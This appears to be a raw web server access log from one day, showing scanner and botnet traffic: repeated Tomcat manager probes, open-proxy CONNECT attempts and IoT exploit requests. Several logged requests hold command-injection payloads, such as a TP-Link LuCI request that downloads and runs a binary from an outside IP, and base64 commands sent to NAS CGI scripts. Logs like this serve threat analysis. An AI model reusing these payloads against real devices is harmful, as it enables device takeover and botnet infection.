128.199.137.235 - - [04/May/2024:00:02:36 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:07:48 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:13:06 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:18:15 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:23:26 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:28:36 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:33:47 +0200] "GET /manager/html HTTP/1.1" 401 2499 162.243.150.36 - - [04/May/2024:00:33:52 +0200] "GET / HTTP/1.1" 200 1895 128.199.137.235 - - [04/May/2024:00:39:11 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:44:22 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:49:34 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:54:46 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:00:59:55 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:05:08 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:10:19 +0200] "GET /manager/html HTTP/1.1" 401 2499 80.76.49.130 - - [04/May/2024:01:10:30 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 128.199.137.235 - - [04/May/2024:01:15:34 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:20:57 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:26:23 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:32:00 +0200] "GET /manager/html HTTP/1.1" 401 2499 87.121.69.52 - - [04/May/2024:01:32:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [04/May/2024:01:34:25 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:01:34:28 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:01:34:28 +0200] "GET /favicon.ico HTTP/1.1" 404 729 128.199.137.235 - - [04/May/2024:01:37:38 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:42:54 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:48:12 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:01:53:36 +0200] "GET /manager/html HTTP/1.1" 401 2499 205.210.31.43 - - [04/May/2024:01:55:52 +0200] "GET / HTTP/1.0" 200 1895 128.199.137.235 - - [04/May/2024:01:58:59 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:04:22 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:09:44 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:15:09 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:20:34 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:26:00 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:31:28 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:36:55 +0200] "GET /manager/html HTTP/1.1" 401 2499 65.49.1.83 - - [04/May/2024:02:41:12 +0200] "-" 400 1930 128.199.137.235 - - [04/May/2024:02:42:24 +0200] "GET /manager/html HTTP/1.1" 401 2499 45.142.182.70 - - [04/May/2024:02:47:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.14.226.142%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 128.199.137.235 - - [04/May/2024:02:47:52 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:53:22 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:02:58:56 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:04:31 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:10:06 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:15:46 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:21:24 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:27:00 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:32:39 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:38:18 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:43:58 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:49:38 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:03:55:19 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:01:02 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:06:49 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:12:42 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:18:30 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:24:17 +0200] "GET /manager/html HTTP/1.1" 401 2499 185.180.140.6 - - [04/May/2024:04:24:51 +0200] "GET / HTTP/1.1" 200 1895 128.199.137.235 - - [04/May/2024:04:30:07 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:35:58 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:42:09 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:48:23 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:04:54:16 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:05:00:12 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:05:06:10 +0200] "GET /manager/html HTTP/1.1" 401 2499 185.180.143.6 - - [04/May/2024:05:07:32 +0200] "GET / HTTP/1.1" 200 1895 45.142.182.70 - - [04/May/2024:05:08:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.14.226.142%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 128.199.137.235 - - [04/May/2024:05:12:18 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:05:18:13 +0200] "GET /manager/html HTTP/1.1" 401 2499 146.19.24.28 - - [04/May/2024:05:21:16 +0200] "GET / HTTP/1.1" 200 1895 128.199.137.235 - - [04/May/2024:05:24:40 +0200] "GET /manager/html HTTP/1.1" 401 2499 195.1.144.107 - - [04/May/2024:05:28:00 +0200] "GET null HTTP/1.1" 400 1994 128.199.137.235 - - [04/May/2024:05:30:28 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:05:35:59 +0200] "GET /manager/html HTTP/1.1" 401 2499 141.98.11.15 - - [04/May/2024:05:40:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 128.199.137.235 - - [04/May/2024:05:41:55 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:05:47:32 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:05:53:11 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:05:59:55 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:06:06:19 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:06:12:46 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:06:19:19 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:06:25:40 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:06:32:07 +0200] "GET /manager/html HTTP/1.1" 401 2499 12.208.125.142 - - [04/May/2024:06:37:08 +0200] "HEAD / HTTP/1.1" 200 - 12.208.125.142 - - [04/May/2024:06:37:09 +0200] "GET / HTTP/1.1" 200 1895 128.199.137.235 - - [04/May/2024:06:38:33 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [04/May/2024:06:44:43 +0200] "GET /manager/html HTTP/1.1" 401 2499 207.167.67.66 - - [04/May/2024:07:08:23 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 78.108.177.51 - - [04/May/2024:07:13:05 +0200] "GET / HTTP/1.0" 200 1895 185.191.126.213 - - [04/May/2024:07:15:07 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [04/May/2024:07:27:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.109 - - [04/May/2024:07:30:02 +0200] "-" 400 1930 205.210.31.109 - - [04/May/2024:07:30:02 +0200] "-" 400 1930 103.245.236.120 - - [04/May/2024:07:30:05 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 743 103.245.236.120 - - [04/May/2024:07:30:05 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 745 103.245.236.120 - - [04/May/2024:07:30:05 +0200] "GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 741 91.92.245.67 - - [04/May/2024:07:35:16 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 179.43.188.106 - - [04/May/2024:09:10:50 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.78 - - [04/May/2024:09:25:46 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [04/May/2024:09:58:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.251 - - [04/May/2024:10:02:13 +0200] "GET / HTTP/1.1" 200 1895 152.32.139.96 - - [04/May/2024:10:46:34 +0200] "-" 400 1930 152.32.139.96 - - [04/May/2024:10:46:45 +0200] "GET / HTTP/1.1" 200 1895 152.32.139.96 - - [04/May/2024:10:47:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.139.96 - - [04/May/2024:10:47:04 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.139.96 - - [04/May/2024:10:47:04 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 80.75.212.75 - - [04/May/2024:10:59:14 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 195.1.144.109 - - [04/May/2024:11:07:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 179.43.188.106 - - [04/May/2024:11:12:20 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:11:20:11 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:11:20:14 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:11:20:14 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.142.182.70 - - [04/May/2024:12:04:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.14.226.142%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 146.19.24.28 - - [04/May/2024:12:21:45 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:12:43:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:12:43:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:12:43:06 +0200] "GET /favicon.ico HTTP/1.1" 404 729 184.105.247.210 - - [04/May/2024:12:51:26 +0200] "GET / HTTP/1.1" 200 1895 184.105.247.210 - - [04/May/2024:12:52:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 184.105.247.226 - - [04/May/2024:12:52:33 +0200] "GET /?format=json HTTP/1.1" 200 1895 184.105.247.230 - - [04/May/2024:12:52:59 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 185.170.144.3 - - [04/May/2024:12:53:18 +0200] "-" 400 1930 179.43.188.106 - - [04/May/2024:12:54:23 +0200] "GET / HTTP/1.1" 200 1895 91.92.245.67 - - [04/May/2024:13:29:27 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.52 - - [04/May/2024:13:36:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.75.212.75 - - [04/May/2024:13:41:53 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 94.156.8.70 - - [04/May/2024:14:48:09 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 151.81.196.110 - - [04/May/2024:15:41:40 +0200] "GET / HTTP/1.0" 200 1895 2.229.100.210 - - [04/May/2024:15:59:48 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 80.75.212.75 - - [04/May/2024:16:16:01 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 198.199.114.78 - - [04/May/2024:16:16:45 +0200] "-" 400 1930 195.1.144.107 - - [04/May/2024:17:11:24 +0200] "GET null HTTP/1.1" 400 1994 141.98.11.15 - - [04/May/2024:17:14:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.211.133.76 - - [04/May/2024:17:21:09 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.70 - - [04/May/2024:17:25:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.14.226.142%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.71.247 - - [04/May/2024:17:48:29 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 154.212.141.169 - - [04/May/2024:18:05:28 +0200] "GET / HTTP/1.1" 200 1895 219.155.42.190 - - [04/May/2024:18:15:30 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 749 195.1.144.109 - - [04/May/2024:18:57:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.52 - - [04/May/2024:19:21:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.75.212.37 - - [04/May/2024:19:25:25 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 91.211.133.76 - - [04/May/2024:19:26:43 +0200] "GET /status HTTP/1.1" 404 724 91.211.133.76 - - [04/May/2024:19:26:43 +0200] "GET /stat HTTP/1.1" 404 722 205.210.31.243 - - [04/May/2024:21:19:48 +0200] "-" 400 1930 205.210.31.243 - - [04/May/2024:21:19:48 +0200] "-" 400 1930 198.235.24.181 - - [04/May/2024:22:02:33 +0200] "GET / HTTP/1.0" 200 1895 45.227.254.8 - - [04/May/2024:22:23:41 +0200] "-" 400 1930 94.156.66.81 - - [04/May/2024:22:36:11 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 80.75.212.37 - - [04/May/2024:22:40:05 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 206.168.32.3 - - [04/May/2024:22:45:34 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:22:45:37 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [04/May/2024:22:45:37 +0200] "GET /favicon.ico HTTP/1.1" 404 729 103.245.236.120 - - [04/May/2024:22:56:23 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 745 103.245.236.120 - - [04/May/2024:22:56:24 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 743 103.245.236.120 - - [04/May/2024:22:56:24 +0200] "GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 741 45.142.182.70 - - [04/May/2024:23:19:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.14.226.142%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 195.1.144.107 - - [04/May/2024:23:23:37 +0200] "GET null HTTP/1.1" 400 1994 78.108.177.51 - - [04/May/2024:23:33:29 +0200] "GET / HTTP/1.0" 200 1895 141.98.11.15 - - [04/May/2024:23:39:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.168 - - [04/May/2024:23:47:56 +0200] "GET / HTTP/1.1" 200 1895